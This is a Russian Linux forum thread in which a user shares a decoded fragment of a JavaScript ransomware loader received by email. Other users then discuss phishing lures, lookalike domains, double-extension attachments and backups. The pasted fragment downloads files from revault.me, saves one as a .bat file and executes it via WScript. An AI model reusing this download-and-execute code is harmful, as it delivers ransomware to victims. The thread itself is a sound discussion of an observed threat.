LINUX.ORG.RU

Офтопик. Шифровальщик.

 ,


0

1

Пришло письмо счастья в виде загрузчиком вируса-шифровальщика (javascript).

открыл, декодировал. Кому интересно часть загрузчика:

function BFAF7D2(a,b,c){return 1}A1CB7D83004DE("http://revault.me/doc.css",""+E0AC+"doc_5e9d.doc");function B9C04DFE82D60C(a){D7B6AD1763.Run(a,1,0)}try{B9C04DFE82D60C(""+E0AC+"doc_5e9d.doc")}catch(a){}function C1A8C48F377D(a){D7B6AD1763.Run(a,0,0)}function QE00(a,b,c){return 4}function Q9FB(a){WScript.CreateObject("Scripting.FileSystemObject");return 3}Q9FB();A1CB7D83004DE("http://revault.me/design.css",""+E0AC+"design.css");A1CB7D83004DE("http://revault.me/ins3.css",""+E0AC+"v6c1e63a05.bat");



Загружает батник ins3.css c домена revault.me, который делает всю черную работу. design.css - похоже gnupg.

Вдруг кому покопаться с ними захочется.

Зачем оно тут? .bat не совсем работает под линуксами, да и изучение кода нормального шифровальщика не даст ничерта: нужен закрытый ключ.

x3al ★★★★★
()

у кого-то оно выполняется?
я имею ввиду не батник (или что там?), а

Загружает батник ins3.css c домена revault.me, который делает всю черную работу

в браузерах js же вроде сильно ограничен в доступе к фс, и тем более к exec

reprimand ★★★★★
()
Ответ на: комментарий от reprimand

Эмм. В письме написать, что к тебе предъявлен иск от <произвольная госструктура>, подробности: линк. Всё. Довольно много ловятся.

x3al ★★★★★
()
Ответ на: комментарий от x3al

Эмм. В письме написать, что к тебе предъявлен иск от <произвольная госструктура>, подробности: линк. Всё. Довольно много ловятся.

бедные люди...
Хотя да, так им и надо.

reprimand ★★★★★
()

ins3.css

Забавный батничек, но как, черт возьми, он управление получает?

dexpl ★★★★★
()
Ответ на: комментарий от reprimand

это каким КОНЁМ надо быть чтобы это сделать

Надо заметить, что когда сидит какой-нибудь продавец чего-нибудь и занимается работай с толпой ещё более неразумных клиентов, которые что только не шлют как попало, то он, по инерции, может и грузануть что-то, даже если примерно понимает, что от этого бывает.

А, до кучи, я наблюдал как-то такое письмо со ссылкой на реально работающий и свежезарегистрированный домен, который отличался от домена одной региональной прокуратуры одной буквой.

Во, вспомнил. http://www.samprok.ru. А при попытке зайти шла цивильная переадресация на http://www.samproc.ru, как будто так и надо. Домен, смотрю, жив ещё.

AS ★★★★★
()
Последнее исправление: AS (всего исправлений: 1)
Ответ на: комментарий от AS

Во, вспомнил. http://www.samprok.ru.

Хотя нет. Что-то сделали, всё же:
state: REGISTERED, NOT DELEGATED, VERIFIED

Непонятно, почему из базы совсем не убрали, или на ту прокуратуру не перерегистрировали.

AS ★★★★★
()
Ответ на: комментарий от x3al

Вроде бывает, что в таких штуках закрытый ключ по глупости или ещё почему, но оказывается рядом с открытым в коде или какой-то другой баг присутствует, который позволяет легко декриптовать.

anonymous_incognito ★★★★★
()
Ответ на: комментарий от reprimand

это каким КОНЁМ надо быть чтобы это сделать

секретаршей например с прикольной внешностью как на твоей авататке например

Promusik ★★★★★
()
Ответ на: комментарий от Promusik

Пример из жизни, из моей конторы.

Сидит старший продаван, ждет согласованный договор. Причем не от одного клиента. Приходит письмо: День добрый,

Скидываю дополнительное соглашение к действующему договору поставки - см. приложение к письму. Поскольку с Евгением Алексеевичем нами было согласовано изменение количества поставленного товара, в приложенном архиве Вы найдете и сч.-фактуру с корректировками. На вторник мы запланировали подписание, так что просьба подтвердить высланные документы не позднее 26-го октября.

--- с Ув.,, Зам. глав. бухгахлтера АО ТоргДомРос

К письму приатачен архив: КорректирующийДоговор_1234.zip В архиве файлик с именем «è«ÓÓѬԿӫó«þ¡Ù® ßþÑÔ-õá¬ÔÒÓá ¿ ä«»«½¡¿Ôѽý¡«Ñ ß«ú½áÞÑ¡¿Ñ ¬ ñ«ú«ó«ÓÒ ¡á »«ßÔáó¬Ò Ô«óáÓá. Å«ñ»¿ßáÔý ñ« 27 «¬Ô´íÓ´_ß«ú½áß«óá¡« ñ¿ÓѬԫӫ¼_d56eee43d9c.tÕt .js» Антивирус на него дышит ровно, человек автоматически, ему сотня таких в день приходят, клацает мышем.

И все, привет файлам.

Кстати,в батнике ins3.css генерируется пара ключей, и похоже если у админа будет сам скрипт шифровальщик, есть шанс восстановить хотя-бы важные данные.

w00zy
() автор топика
Ответ на: комментарий от x3al

Тебя нужно уволить. Когда у тебя в конторе 200 блондинок, а антивирус за который заплатили кучу бабла спокойно пропускает вновь появившиеся трояны, то админ здесь совсем не причем. Можно конечно закрутить гайки, все жестко ограничить, но есть различные корпоративные особенности + ко всему грамотно делать бакапы не всегда позволяет финансовое состояние и прочие сложности.

Promusik ★★★★★
()
Ответ на: комментарий от Promusik

Когда у тебя в конторе 200 блондинок, а антивирус за который заплатили кучу бабла спокойно пропускает вновь появившиеся трояны, то админ здесь совсем не причем.

Какой, к чёрту, антивирус? Бэкапы где? Нет бэкапов — в конторе работает аникейщик, а не админ.

x3al ★★★★★
()
Ответ на: комментарий от x3al

Все верно. Но нас, как у большинства мелких контор, приходящий эникейщик. Однако, даже если встанет он за каждым менеджером и бухгалтером - все одно, не спасет от простой невнимательности и глупости человеческой. Это я простой кладовщик, и следовательно слегка параноик, установил на рабочий комп привычный дебиан, а с сервером 1с работающий через Remmina. И то, открыл архив, сохранил файло, только потом сообразил, что мне каку суют. А был-бы архив TAR, да файл sh скрипт под линукс заточеный, да с правами на исполнение, да и я не трезвый - пришлось бы пару часов с облаком документы свои синхронизировать...

А так у нас троим пришло письмо с подобной какой, все двое начали с нуля.

w00zy
() автор топика
13 декабря 2015 г.
Ответ на: комментарий от Promusik

Системный администратор и вся его сущность созданы специально для БЛОНДИНОК. Запомни это новорождённый. И да, профнепригодность админа на первом месте, а потом уже идёт фильтр почты, далее фаервол, далее сканер антивируса и уже ПОСЛЕ следует блондинка, главбух или иной юзер, ради которого админ был сотворён из бинарного кода. Так что пеняй только на себя, родной.

anonymous
()
Ответ на: комментарий от anonymous

Так что пеняй только на себя, родной.

Болезный мой, да кто же тебя срать в старых темах то научил? Съешь мягких булок, самородок.

w00zy
() автор топика
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.